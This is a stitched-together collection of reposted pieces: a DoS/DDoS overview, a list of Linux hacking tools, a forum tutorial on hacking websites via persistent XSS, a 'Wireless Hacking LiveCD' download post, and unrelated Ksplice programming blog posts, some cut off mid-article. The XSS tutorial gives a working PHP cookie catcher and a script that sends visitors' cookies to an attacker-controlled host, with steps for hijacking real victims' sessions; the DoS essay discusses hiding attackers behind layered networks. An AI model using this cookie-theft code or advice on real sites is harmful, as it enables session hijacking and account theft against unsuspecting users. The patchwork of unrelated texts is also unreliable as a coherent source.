Quick introduction to DoS and DDoS

With the current expansion of Internet worldwide, it became extremely necessary the creation of new forms of attacks by the hacker community, the concept of DoS (Denial of Service) and DDoS (Distributed Denial of Service) was born. This type of attack became popular by targeting entities where the availability of various services is the key to the entity's success as well as the reason for its existence, amongst those entities we can include as examples, Banks, ISP, E-commerce websites, etc.. Where every hour, minute or even second means the possible loss of huge amounts of money.

Pre-Attack and Pre-Requirements

It became, for quite a long time an unsolved puzzle for many security professionals the choice of the best time to create an attack network, pre-target-identification or post-target-identification, for sake of neutrality let's say that the best time depends on the objective to achieve, the attacker's mentality and its skills.
We can easily understand that creating a pre-target-identification attack network that is fully functional at the zero attack hour has the same impact as a post-target-identification attack network of the same size ,power and is completely functional but in reality this is not completely true. A pre-target-identification has to be idle for more time, therefore causing network nodes to become inactive either by a sysadmin covering/fixing/patching the attacker's entry point or by the implementation of more restrictive security measures.
The attack methodology used for the expansion of an attack network have been modified since the earliest *DoS attacks, what started as simple Host-by-host attack and the successive host append to the network turned into a battle of "intelligent" scripts/worms capable of doing the job by their own means without almost no human intervention on the process and with a power far more superior than the individual host attack method.
Once formed the attack network, let's look at the attacker as a pyrotechnic technician with all his fireworks ready to launch and begin the show...The countdown clock reaches zero... The attacker presses the trigger (or some pre scheduled event occurs)... The show begins... But what happens?

Post Attack Analysis

From the uninformed victim's point of view, the attack was apparently conducted by various attackers at the same time, almost like an army that marched towards a castle, the real enemy would be the army's leading person and the army itself would just be the attacker's puppets, this lack of knowledge gives the attacker some time, making the victim go through all of the painful "Back-trace" process which sometimes due to a small budget, the high adjacent cost of the analysis and depending on the dimension of the damages caused can lead to the suspension of the attack's forensics.

Protection layers

It is fairly trivial that the more protection layers exist between the attacker and the victim, more anonymous and protected the attacker's identity will be and more difficulties will the victim run across to unveil the attack source.
An elevated number of layers will, as expected, create "lag" between layers which can lead, if badly idealized, to the total of partial failure of the attack, on the other hand a small number of layers can lead to an easy detection of the attacker and therefore, large prejudice for the attacker, it is, in sum, essential to create a balance between both extremes to obtain a successful attack and effective risk distribution.

Other types of DoS

Examples of other attacks aimed at basic and essential company and individual's resources which are "un-wired" can include amongst others, electrical or telephonic cuts, extreme adverse climate conditions (bearing in mind that this attack is however not controlled by the attacker), access cuts (roads,etc..) and probably the most common used forms, the interception and/or manipulation followed by a negation of information or data transmitted via mail etc..

refrence:http://www.astalavista.com/page/articles/_/lectures/quick-introduction-to-dos-and-ddos-r25

Top 10 Linux Hacking Tools

For installation of packages for :

Ubuntu: apt-get install program name
Fedora: yum install program name
Open Suse: yum install nessus program name
Debain: apt-get install nessus program name
Gentoo: emerge -v program name
Arch Linux: pacman -S program name
Just Replace program name with the program you want to install. Again if you need any help PM me.


1. Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

2. Aircrack :
~The fastest available WEP/WPA cracking tool~
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

3. Nessus :
~Premier UNIX vulnerability assessment tool~
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.


4. Snort :
~Everyone's favorite open source IDS~
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

5.WireShark:
~Sniffing the glue that holds the Internet together~
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

6. John the Ripper :
~A powerful, flexible, and fast multi-platform password hash cracker~
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here

**NOTE For John the Ripper the program,the name you use is john to install**
eg. apt-get install john

7. Kismet :
~A powerful wireless sniffer~
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating.


8. Metasploit Framework :
~Hack the Planet~
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

***You can not install Metasploit Framework, But you can read about it here**

9. Nikto :
~A more comprehensive web scanner~
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

10. Netcat :
~The network Swiss army knife~
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits

11.THC Hydra:
~A Fast network authentication cracker which supports many different services~
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

You can get THC Hydra from HERE

12. Ettercap :
In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

reference:hackforums.net

[Tut] How to Hack a Website by XSS

Hello Guys !

I am going teach you How to hack a website through XSS (Persistent Cross Site Scripting).

I wrote it because i didnt find a Nice Tut to explain XSS. I didnt added much pics as I dont want to hack an website for just a tut. But this is pretty much easy and you will learn without much difficulties.



" Something about XSS " :-


XSS is basically using java scripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.
XSS is a very large concept and your success rate depends on your imagination and experience.
Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something.
Where XSS is just understanding the way we can use java scripts,
and the vulnerabilities of the website may be at the different places for executing your java scripts.


So I could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with
XSS is Cookies. The cookies are used to maintain user authentication of respective website.



" XSS " :-


* Search terms :- Almost all of the websites have search boxes where you can try to search something from the website.
In the search box you can type your malicious script and check the vulnerability.



* Text Boxes :- If you see any type of text boxes in the website which will basically let you
put some query in it.

So we are trying to find a place where we can write something, which will later be shown in the same webpage.




" Types of XSS " :-



There are 2 types of XSS vulnerability.


1. Persistent Cross Site Scripting

2. Non-persistent Cross site Scripting.



Lets go for Persistent Cross Site Scripting.


" Persistent Cross Site Scripting " :-



Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.

Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.



Lets Suppose we have http://www.example.com.
Its just for Example and actually example 's website Doesnt exist ! =P




" Checking for Vulnerability " :-



Now, the very first thing we will have to see is a place where we can input some text,
and later on that should be displayed.

For example of secure sites,in Hackforums.com, we have a search bar, so in the search bar lets
put “test” and hit enter.
You will see that it will say “Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again.”.
But you should notice here that it doesn’t say “No search results found for “test”.
So it means that it is not Echoing the word that we put into the search bar.
So there is no chance to exlpoit the search bar of Hackforums.

" Testing Java Scripts " :-



Now, since we know that the website is vulnerable to XSS.
We will try to run a small java script into the website.



script type="text/javascript" alert('test') script


So what this will do is, it will popup a little alert box saying “test” on it.
And if it does that, it means that it accepts the javascripts input as well.


Remember : you can even use -
script type="text/javascript" alert('your Name') script

It will show something like -



Once, you’re done just clikc on the "Ok" or “Preview” button at the bottom.
And in the next page you should get a popup that says “test”.




" Finding Cookies " :-


Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.

javascript:alert(document.cookie)

As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us.


Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.




" Creating Cookie Catcher " :-



Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.

[?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’


’);
fclose($fp);
header (“Location: http://www.yoursite.com”);
?]



Just a little elaboration about the script. The first statement will get the cookies.
Second statement will get the IP. Third statement will get the referer. T
he last link would send the victim to “Yoursite.com”.
To make it a little less suspecious, you can change the link to example.com,
so the victim wouldnt see anything unusual. so on. Copy the given code and put it into a notepad.
Save it as something.php. Just make sure that you change the format to “.php”.

You’ll need a free webhosting account where you can upload the file. I personally use “spam.com”, so create an account there and upload this php file. Make sure that you change its permissions to “777″.



" Testing Cookie Catcher " :-


Now, as you guyz have seen that we have been executing a little script in that page which brings
up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher.



script document.location=”link-of-your-cookie-catcher?c=” + document.cookies script




" Elaboration on the script " :-


Document.Location will change the location of the website and we have set it equals to the
link of your cookies catcher and “?c=” we’ve added because its a get statement.
“+ document.cookies” means to visit your cookie catcher with the cookies of your victim’s site
so it can record it.



Now, here is the second

Lets try if it works or not. I am going to using the script that I have shown in the
“Something” page of example.com.




Now, If you click on Ok or Preview, it will take you to yoursite.com OR whatever you have changed
the link to in the Cookie Catcher. Now, lets login back to spam.com account, and you will
notice another “cookies.html” file has been added, automatically.



Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file.


Cookie: undefined
IP: MY IP
Date and Time: 3 April, 2010, 2:03 am
Referer: http://www.example.com/preview.php?incli...ect=2009&i[/color]ncident_hour_select=8&incident_min_select=30&incident_AMPM_
select=AM&policyNo=&cellNo=&preview=Preview



Note: This will look a little different from actual cookies, because when i stole these,
i wasnt logged in, so if a user is logged in, then you should get a little different from this.

Now, Get “cookie editor” addon of mozilla firefox.


" Stealing Actual Cookies " :-


Till now, we were our own victim, we were trying to steal our own cookies to make sure this works.
Now, lets try to get some actual victims. In the site, you may have to PREVIEW the post first and
then submit it. So the javascript is getting executed whenever you preview it, so we can not
submit it because the script is already executed. And may be in other sites, you can directly
submit the post, so the moment someone opens it, you will get the cookies.



Whenever you put the script in the “NAME” and something something in other fields, you click on preview,
QUICKLY, before it redirects you to the website as described in your cookie stealer,
the URL will change to something else for a moment.
Thats what you will have to copy. What i copied was this.


http://example.com/preview.php?inclinati...ew=Preview


And then , you just give this link to your victim, as soon as they click ON it, you get the cookies.

It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link,
you will actually submit the report. So as soon as someone reads it you get the cookies.

refernce:hackforums.net [cyclone]

WIFISLAX-Live CD WIFI Hack


Wireless Hacking LiveCD FBI 2010 | 630 MB

An edited and slightly updated version of the popular LiveCD for working with wireless networks. Based on Ubuntu, provides a graphical interfeys.Disk boot, there is a script to be installed on the PC hard drive or a virtual machine (VirtualPC is not supported). Integrated over 50 tools to work with the network – scanners, sniffers, password crackers, and so on. utility.Krome of this – a full Linuhe sustainable yadrom.Posle installed on the hard disk system can be Russified, supplemented, adjusted to taste vladeltsa.V addition to the Back Track 4 – a very powerful set of tools to work with networks in the first place – besprovodnymi.Imeetsya a decent set of drivers for many types adapterov.V inete in various models has been known since 2007, the popular view that his creation had to do with the FBI.
Requirements:
RAM] 256 Mb
CPU] 800 GHz
HDD] 4 Gb

Checksums:
CRC32: 0D504602
MD5: D6E4E9DBCE86DC165DCF24808 1E4F421
SHA-1: 489BE5B921211986F47EECA42 EE516275BE94267

Year: 2010
Developer: GNU
Type: Hack & Tools
Medicine: Not required
Size: 630 MB
http://hotfile.com/dl/42033254/285b29c/Wireless_Hacking_LiveCD_FBI_v_2010.part1.rar.html
http://hotfile.com/dl/42033361/eed387f/Wireless_Hacking_LiveCD_FBI_v_2010.part2.rar.html
http://hotfile.com/dl/42033499/4ee96bb/Wireless_Hacking_LiveCD_FBI_v_2010.part3.rar.html
http://hotfile.com/dl/42033607/596db3c/Wireless_Hacking_LiveCD_FBI_v_2010.part4.rar.html


reference:r00tsecurity

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we’re always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.
If you’ve ever programmed in C, you’ve probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded “Segmentation Fault”. Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today’s installment, we’ll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I’ll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!
What’s in a pointer?
There’s nothing fundamentally magical about pointers in C (or assembly, if that’s your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer’s memory. We can write a C program to print out a random pointer:
#include
int main(int argc, char **argv) {
printf("The argv pointer = %d\n", argv);
return 0;
}

Which, if you run it on my machine, prints:
The argv pointer = 1680681096
(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that’s just a notational thing. They’re still just integers.)
NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it’s just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.
But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you’re browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It’s actually even worse than that: a bug in IE can even take down the entire operating system.
This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other’s memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program’s address space to different pieces of physical memory.

mmap(2)
One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.
Because each application has its own address space, however, it is free to do with it as it wants. For instance, you’re welcome to declare that NULL should be a valid address in your application. We refer to this as “mapping” the NULL page, because you’re declaring that that area of memory should map to some piece of physical memory.
On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
Let’s go through those arguments in order (All of this information comes from the man page):
addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a “page”, which is 4k (4096 bytes) on x86 processors.
prot
Short for “protection”, this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process’s address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we’re going pass MAP_ANONYMOUS in flags, which indicates that we don’t want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.
If we just want to be able to read and write the NULL pointer, we’ll want to set addr to 0 and length to 4096, in order to map the first page of memory. We’ll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we’ll set them to -1 and 0 respectively.
Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!
(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you’ll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)
#include
#include

int main() {
int *ptr = NULL;
if (mmap(0, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
== MAP_FAILED) {
perror("Unable to mmap(NULL)");
fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
return 1;
}
printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
*ptr = 17;
printf("Now it's: %d\n", *ptr);
return 0;
}
Next time, we’ll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel’s address space. And, I’ll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!
The 1st International Longest Tweet Contest
Posted in Programming on March 25th, 2010 by Keith Winstein – 30 Comments
How much information is in a tweet?
There are a lot of snarky answers to that. Let’s talk mathematically, where information is measured in bits: How many bits can be expressed in a tweet?
It’s kind of fun to try to figure out how to cram in the most information. Our current in-house record is 4.2 kilobits (525 bytes) per tweet, but this can definitely be bested. Twitter’s 140-character limit has been under assault for some time, but nobody has decisively anointed a winner.
To that end, announcing the 1st International Longest Tweet Contest, along the lines of the International Obfuscated C Code Contest. The goal: fit the most bits of information into a tweet. There will be glorious fame and a T-shirt for the winner. More on that later. But first, a dialog:
Ben Bitdiddle: How big can a tweet get? SMS is limited to 160 characters of 7-bit ASCII, or 1,120 bits. Since Twitter based their limit on SMS but with 20 characters reserved for your name, a tweet is probably limited to 140 × 7 = 980 bits.
Alyssa P. Hacker: Not quite — despite its SMS roots, Twitter supports Unicode, and the company says its 140-character limit is based on Unicode characters, not ASCII. So it’s a lot more than 980 bits.
Ben: Ok, Unicode is a 16-bit character set, so the answer is 140 × 16 = 2,240 bits.
Alyssa: Well, since that Java documentation was written, Unicode has expanded to cover more of the world’s languages. These days there are 1,112,064 possible Unicode characters (officially “Unicode scalar values”) that can be represented, including in the UTF-8 encoding that Twitter and most of the Internet uses. That makes Unicode about 20.1 bits per character, not 16. (Since log2 1,112,064 ≈ 20.1.)
Ben: Ok, if each character can take on one of 1,112,064 possible values, we can use that to figure out how many total different tweets there can ever be. And from that, we’ll know how many bits can be encoded into a tweet. But how?
Alyssa: It’s easy! We just calculate the total number of different tweets that can ever be received. The capacity of a tweet, in bits, is just the base-2 logarithm of that number. According to my calculator here, 1,112,064 to the 140th power is about 28.7 quattuordecillion googol googol googol googol googol googol googol googol. That’s the number of distinct 140-character messages that can be sent. Plus we have to add in the 139-character messages and 138-character messages, etc. Taking the log, I get 2,811 bits per tweet.
Ben: We’d get almost the same answer if we just multiplied 20.1 bits per character times 140 characters. Ok, 2.8 kilobits per tweet.
Alyssa: I just discovered a problem. There aren’t that many distinct tweets! For example, I can’t tell the difference between the single character ‘<’ and the four characters ‘<’. I also can’t send a tweet that contains nothing but some null characters. So we have to deflate our number a little bit. It’s tricky because we don’t know Twitter’s exact limitations; it’s a black box.
Ben: But the answer will still be roughly 2.8 kilobits. Can we do better?
Alyssa: By golly, I think we can! Turns out Unicode is basically identical to an international standard, called the Universal Multi-Octet Coded Character Set, known as UCS or ISO/IEC 10646. But the two standards weren’t always the same — in the 90s, there was a lot of disagreement between the computer companies who backed Unicode and proposed a simple 16-bit character set, and the standards mavens behind UCS, who wanted to accommodate more languages than 65,536 characters would allow. The two sides eventually compromised on the current 20.1-bit character set, but some historical differences still linger between the two “official” specifications — including in the definition of the UTF-8 encoding that Twitter uses. Check this out:


Alyssa: Although Unicode’s UTF-8 can only encode the 1,112,064 Unicode scalar values, UCS’s version of UTF-8 is a lot bigger — it goes up to 31 bits!
Ben: So, when Twitter says they use UTF-8, which version are they using? Unicode, or UCS?
Alyssa: Hmm, that’s a good question. Let’s write a program to test. I’ll send Twitter a really big UCS character in UTF-8, represented in octal like this. This is way outside the bounds of well-formed Unicode.
$ perl -Mbytes -we 'print pack "U", (2**31 - 5)' | od -t o1
0000000 375 277 277 277 277 273

Ben: Hey, that kind of worked! When we fetch it back using Twitter’s JSON API, we get this JSON fragment:
“text”:”\\375\\277\\277\\277\\277\\273″

Alyssa: It’s the same thing we sent! The character (really an unassigned code position) is represented in UTF-8, in octal with backslashes in ASCII. That means Twitter “characters” are actually 31 bits, not 20.1 bits. The capacity of a tweet is actually a lot bigger than the 2.8 kilobits we calculated earlier.
Ben: Should we worry that the text only shows up in the JSON API, not XML or HTML, and these high characters only last a few days on Twitter’s site before vanishing?
Alyssa: Nope. As long as we had this exchange in our conversation, people on the Internet won’t complain about those issues.
Using Alyssa’s insight that Twitter actually supports 31-bit UCS characters (not just Unicode), we can come up with a simple program to send 4.2-kilobit tweets using only code positions that aren’t in Unicode. That way there’s no ambiguity between these crazy code positions, which Twitter represents as backslashed octal, and legitimate Unicode, which Twitter sends literally. These tweets have a text field that’s a whopping 3,360 bytes long — but in ASCII octal UTF-8, so they only represent 525 bytes of information in the end.
The sender program reads the first 525 bytes of standard input or a file, slices it into 30-bit chunks, and sends it to Twitter using 31-bit UCS code positions. The high bit of each character is set to 1 to avoid ever sending a valid Unicode UTF-8 string, which Twitter might treat ambiguously. It outputs the ID of the tweet it posted. You’ll have to fill in your own username and password to test it.
The receiver program does the opposite — give it an ID on the command line, and it will retrieve and decode a “megatwit” encoded by the sender.
Here’s an example of how to use the programs and verify that they can encode at least one arbitrary 4,200-bit message:
$ dd if=/dev/urandom of=random.bits bs=525 count=1
1+0 records in
1+0 records out
525 bytes (525 B) copied, 0.0161392 s, 32.5 kB/s
$ md5sum random.bits
a7da09e59d1b6807e78aac7004e6ba41 random.bits
$ ./megatwit-send < random.bits
11037181699
$ ./megatwit-get 11037181699 | md5sum
a7da09e59d1b6807e78aac7004e6ba41 -

But this is just the start -- we're not the only ones interested in really long tweets. (Structures, strictures...) Others have found an apparent loophole in how Twitter handles some URLs, allowing them to send tweets with a text field up to 532 bytes long (how much information can be coded this way isn't clear). Maxitweet has come up with a clever way to milk the most out of 140 Unicode characters without requiring a decoder program, at least at its lower compression levels. There are definitely even better ways to cram as many bits as possible into a tweet.
So here is the challenge for the 1st International Longest Tweet Contest:
Come up with a strategy for encoding arbitrary binary data into a single tweet, along the lines of the sample programs described here.
Implement a sender and receiver for the strategy in a computer programming language of your choice. We recommend you choose a language likely to be runnable by a wide variety of readers. At your option, you may provide a Web site or other public implementation for others to test your coding scheme with arbitrary binary input.
Write a description, in English, for how your coding scheme works. Explain how many bits per tweet it achieves, and justify your calculation. The explanation must be convincing because it is intractable to prove conclusively that a certain capacity is achievable, even if a program successfully sends and receives many test cases.
Send your entry, consisting of #2 and #3, to megatwit@ksplice.com before Sunday, April 11, 2010, 23h59 UTC.
Based on the English explanations of the coding schemes (#3), we'll select finalists from among the entrants. In mid-April, we'll post the finalists' submissions on the blog. In the spirit of Twitter, we'll let the community assess, criticize, test, and pick apart the finalists' entries.
Based on the community's feedback, we'll choose at least one winner. This will generally be the person whose scheme for achieving the highest information encoded per tweet is judged most convincing.
The winner will receive notoriety and fame on this blog, and a smart-looking Ksplice T-shirt in the size of your choice. You will be known the world over as the Reigning Champion of the International Longest Tweet Contest until there is another contest. Legally we can't promise this, but there's a chance Stephen Colbert will have you on as a result of winning this prestigious contest.
By entering the contest, you are giving Ksplice permission to post your entry if you are selected as a finalist. The contest is void where prohibited. The rules are subject to change at our discretion. Employees of Ksplice aren't eligible because they already have T-shirts. Judging will be done by Ksplice in its sole discretion.
That's it. Happy tweeting!
Hello from a libc-free world! (Part 1)
Posted in computer architecture on March 16th, 2010 by Jessica McKellar – 104 Comments
As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.
This should be easy, right?
This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.
Here’s our basic Hello World program:
jesstess@kid-charlemagne:~/c$ cat hello.c
#include

int main()
{
printf("Hello World\n");
return 0;
}

Let’s compile it and get a bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.
So let’s stop using it. We won’t use printf so we can get rid of our include file:
jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
{
char *str = "Hello World";
return 0;
}
Recompiling and checking the bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!
The problem is that gcc is still using standard library startup files when linking. Want proof? We’ll compile with -nostdlib, which according to the gcc man page won’t “use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker”.
jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it’s just a warning; let’s check it anyway:
jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)…
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

…at the expense of segfaulting when it runs. Hrmph.
For fun, let’s get our program to be actually runnable before digging into the assembly.
So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you’re using libc?
